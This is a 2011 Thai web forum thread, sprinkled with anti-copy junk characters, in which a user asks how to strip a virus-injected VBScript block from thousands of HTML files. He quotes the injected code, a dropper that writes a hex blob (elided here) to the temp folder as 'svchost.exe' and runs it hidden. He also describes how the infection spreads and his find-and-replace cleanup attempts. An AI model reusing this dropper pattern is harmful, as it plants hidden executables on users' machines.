Discuz Thai

 ลืมรหัสผ่าน
 สมัครสมาชิก

ข้อตกลงการใช้งานกระดานข่าวดิสคัสไทย DiscuzThai Agreement (English Version) ประกาศดิสคัสไทย - ทำเนียบดิสคัสภาษาไทย

Discuz! X3.5 Thai R20231001 Rev.8 (NEW) [วิดีโอช่วยสอน] อัปเกรด Discuz! X3.4 เป็น X3.5 Discord ของ Discuz! Thai Community อย่างเป็นทางการ

Discuz! X3.4 Thai R20220811 (REV.75) สิ้นสุดการสนับสนุน Discuz! X3.4 ภาษาไทยตั้งแต่วันนี้เป็นต้นไป (ขอแนะนำให้อัปเกรดเป็น X3.5 แทน)

ค้นหา
แท็กยอดนิยม: ดิสคัสภาษาไทย Discuz Thai
ดู: 3986|ตอบกลับ: 3

[Live Talk] How to del. this script [Help me please]

[คัดลอกลิงก์]
adman โพสต์ 2011-5-15 23:22:45 |โหมดอ่าน
on *.htm *.html+ S3 Y* ?) O  Z" ~: D3 G
$ p4 |; Q7 X" Z4 m
</html>; y6 y+ o, u/ I, M
<SCRIPT Language=VBScript><!--+ j) H' M: C% X' J! n7 q5 _5 K
DropFileName = "svchost.exe"
/ _( ~' B9 R4 S  N3 VWriteData = "4D5A900003................................................."     <<== sample* {( C/ s& _* r, s: J
Set FSO = CreateObject("Scripting.FileSystemObject")5 ?  q, m4 i4 m9 U1 e+ L, w1 a* a
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
/ M/ F7 t' v' N1 D6 H/ a6 r0 L/ PIf FSO.FileExists(DropPath)=False Then0 G" |. U, Y7 w
Set FileObj = FSO.CreateTextFile(DropPath, True)' L4 L- }: b1 k5 ^$ E( d/ y
For i = 1 To Len(WriteData) Step 21 z, c' `+ [3 X7 Z! \6 ]6 U
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
( S1 ~5 G, P  B% f; O2 DNext4 F/ ?% H1 l8 B0 y* q) ]
FileObj.Close/ p, W2 H- ^7 s! `* W
End If; x# R+ b/ I. p
Set WSHshell = CreateObject("WScript.Shell")2 x# O& m* [9 d# R) b
WSHshell.Run DropPath, 0
/ e0 M' |7 h9 a* X4 @% u+ f# U
 เจ้าของ| adman โพสต์ 2011-5-16 00:57:45
พอจะหาทางออกได้แล้วครับ...แต่อาจจะมีวิธีอื่นที่ดีกว่า
: W( t/ P+ h  V2 K6 i4 N: \( x8 |) [% W7 `
ปัญหาของผมก็คือ ไฟล์ติดไวรัส ค่อนข้างจะอันตรายมากทีเดียว1 I/ S2 a9 Q1 U0 l- C; E. f0 q
เพราะทุกไฟล์ที่เป็น *.html กับ *.htm
2 C9 o5 b6 T( ~; C% m( a* ]' ^จะถูกฝังโค้ดนี้
  1. <SCRIPT Language=VBScript><!--
    ; J5 V6 @2 w; p7 }% ?) O7 [$ @. N
  2. DropFileName = "svchost.exe"
คัดลอกไปที่คลิปบอร์ด
ซึ่งมีประมาณ สองเหมือนตัวอีกษรได้ แต่ผมยกตัวอย่างมาแค่นี้- J/ g: K: x& ~: u
# i3 r- f5 b) C& y7 `2 i
สคริปตัวนี้มันจะทำงานยังไง ? * Q" u  D% F0 L$ s" D
ก็คือว่า จะสั่งให้ svchost.exe ค้นหาไฟล์ *.html *.htm แล้วฝังโค้ตลงไป ต่อท้าย </html>
, G% e/ ]5 J4 `- l9 ?ซึ่งจะส่งผลให้ขนาดไฟล์ใหญ่ขึ้น จากปกติ 1kb ก็จะเพิ่มเป็น 123kb โดยประมาณ! J7 _' Z; I- E
ทุก ๆ 5 นาทีจะเพิ่มขึ้น 2 เท่าไปเรื่อย ๆ .....สุดท้าย ฮาร์ดดิสค์ก็จะเต็ม แดงเถือกโดยไม่รู้ตัว# C3 V9 X$ D6 Q, E6 l5 a! d$ o
CPU ก็จะทำงานหนักตลอดเวลา ส่วน Ram ไม่ต้องห่วง เครื่องคุณมีเท่าไหร่ เต็มหลอดทันที5 I" D% u( Q( T' S: G: U6 P
) I  b$ d5 S7 [' D9 P- B" ^; P
ดูเหมือนจะไม่หนัก แต่ปัญหาอีกอย่างคือ โปรแกรมสแกนไวรัสแทบทุกตัว จะทำการลบไฟล์นี้ทิ้ง ซะงั้น
' u2 J$ Y, j1 S- e9 A. nซึ่งจริง ๆ ผมไม่ต้องการให้เป็นอย่างนั้น เพราะจะทำให้ไฟล์เสียไปด้วย+ }! z# C, H: x6 O! q9 t& a# c2 A
ผมต้องการแค่ลบ โค้ดนี้ออกเท่านั้น....! |1 D4 L* |7 g# {' T/ f
6 ?2 ]  O2 [7 y. N( w1 }& l
วิธีแก้ปัญหาเท่าที่คิดได้ตอนนี้
( }; ~' ~, y" v% w9 K1. เปิดไฟล์ *.html ทีละตัวแล้วนั่งลบโค้ด" \" ^$ o0 o' n5 O9 R' q% r
    ถ้ามีประมาณ 10,000 ไฟล์ ก็จบกันพอดี% z4 {# f/ W1 I5 P* V, s+ Q

% n2 y7 t: j6 W, q2. ใช้โปรแกรม notepad++
3 m) R6 d7 T5 h$ E% n# Q    อันนี้พอช่วยได้ ใช้คำสั่ง replace in file5 H0 Q' f' Q8 S5 E; ^% f, N
    แต่คำได้แค่ทีละนิด
. _  ^- ?! p/ ~( ^3 I' j% Z% v7 U, H( d! _$ N% }* o
3. ใช้ Ultraedit0 t5 i* \8 E* z+ k# S
    วิธีการเดียวกับ notepad++
$ \/ c( c: k9 r, r    แต่ข้อดีคือ replace infile * ได้ครั้งละ 2,000 ตัวอักษร; v  I/ j% c& Q6 l' U9 L+ O

  q; V' I. F# L9 Z/ ^ก็ถือว่าค่อนข้างดีขึ้นมาหน่อย
+ f$ F" \" M0 v& {: A- B& B7 }) Nโค้ดไวรัสที่ผมโดนเข้าไปมีประมาณ 20,000 ตัวอักษร สรุปต้องทำประมาณ 10 ครั้ง# C# \; n# m- t( s, _

: T# J( e7 d/ q' B# Q) u1 M. [
0 r  B  o+ U7 u$ H) y* replace infile   : คือการค้นหาโค้ด และแทนที่ โดยไม่ต้องเปิดไฟล์
- ~' X/ u: m. v: K   สามารถค้นหาได้ถึง subfolder
5 Q8 [& z  J7 P0 u' P" |3 D' A; m% u  O  X
ท่านใดมีทางอื่น แนะนำช่วยด้วยนะครับ
jaideejung007 โพสต์ 2011-5-16 08:14:50
ลบออกทั้งหมดเหอะครับพี่ หากมันแพร่กระจายไปได้ขนาดนั้น
) Q" X% q/ Z, p& e' g' m! Y
% z7 E  y" f- {/ q  [ถึงเราจะลบออกได้ แต่ก็อาจจะยังหลงเหลืออยู่(ซักไฟล์ล่ะน่า)
 เจ้าของ| adman โพสต์ 2011-5-17 18:02:03
พอมีวิธีอื่นไหม" L, X# l" @! B  C, ^9 ~
ตอนนี้ไปเจอโปรแกรม Kis 2012 ยังเป็น Beta
: O2 t, U3 V& F" m6 _# Y3 U0 Oรุ้สึกว่าจะทำงานได้ดีกว่า เพราะมันจะลบโค้ดนั้นให้ แต่ไม่ลบไฟล์
, C7 \: V* T4 O4 C- t2 u1 dแค่สั่ง scan เท่านั้น ไม่รู้จะดีไหม กำลังลองดู
ขออภัย! คุณไม่ได้รับสิทธิ์ในการดำเนินการในส่วนนี้ กรุณาเลือกอย่างใดอย่างหนึ่ง ลงชื่อเข้าใช้ | สมัครสมาชิก

รายละเอียดเครดิต

รายชื่อผู้กระทำผิด|Archiver|ดิสคัส ไทย Follow us: Become a fan on facebook. Follow us on Twitter.

GMT+7, 2024-5-20 18:11

Powered by Discuz! X3.4, Rev.66

Copyright © 2001-2021 Tencent Cloud. Licensed

ตอบกระทู้ ขึ้นไปด้านบน ไปที่หน้ารายการกระทู้